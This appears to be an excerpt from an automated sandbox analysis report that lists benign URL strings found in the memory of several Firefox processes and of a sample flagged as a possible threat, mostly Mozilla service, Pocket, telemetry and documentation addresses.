Source: firefox.exe, 00000011.00000003.2399837909.000002435C767000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000011.00000003.2456401062.000002435DD84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000011.00000003.2453517510.000002435C748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000011.00000003.2260044945.000002435B750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259914575.000002435B736000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260276730.000002435B783000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000011.00000003.2332689238.000002435E4F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000011.00000003.2332689238.000002435E4F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000011.00000003.2332689238.000002435E463000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2479878785.00000243655B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000011.00000003.2480393696.00000243654B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000011.00000003.2480700187.0000024365420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000011.00000003.2480700187.0000024365420000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2307680554.0000024368997000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305170781.0000024363831000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000011.00000003.2474549451.00000243689D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000011.00000003.2388692284.000002435C732000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305170781.0000024363831000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000011.00000003.2446484016.000002435E29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2423049050.000002435E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2398701841.000002435E0D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260276730.000002435B783000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495626539.000002435E0AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000011.00000003.2347089065.0000024368482000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE513000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000011.00000003.2322644746.000002435C074000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2325769645.000002435DFB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2322644746.000002435C08C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2323589912.000002435C071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000011.00000003.2495164004.000002435E224000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE513000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE530000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000016.00000002.3338371718.00000184C72C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000011.00000003.2444720249.0000024368334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreM
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreMore
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: https://github.com/aria2/aria2/issues
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305170781.0000024363831000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000011.00000003.2401229475.00000243658DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335780358.00000243658DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2426047925.00000243658DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2405615746.00000243658DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2377897924.00000243658DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000011.00000003.2401229475.00000243658DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335780358.00000243658DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2426047925.00000243658DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2405615746.00000243658DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2377897924.00000243658DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000011.00000003.2260044945.000002435B750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259914575.000002435B736000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.mdhttps://www.mozilla.o
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000011.00000003.2333638774.000002435E267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000011.00000003.2482841092.0000024363792000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2445600803.0000024363792000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000011.00000003.2495445273.000002435E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/discoverystream.personalization.modelKeysdiscoverystream.perso
Source: firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000011.00000003.2482098631.00000243650E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/aebb9512-41f6-4c0d-8d9a-1f264
Source: firefox.exe, 00000011.00000003.2495836623.000002435E090000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/8796545b-dfb2-4a6f-9105-292d
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitresource://activity-stream/lib/ASRouter.jsm(
Source: firefox.exe, 00000011.00000003.2481936753.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
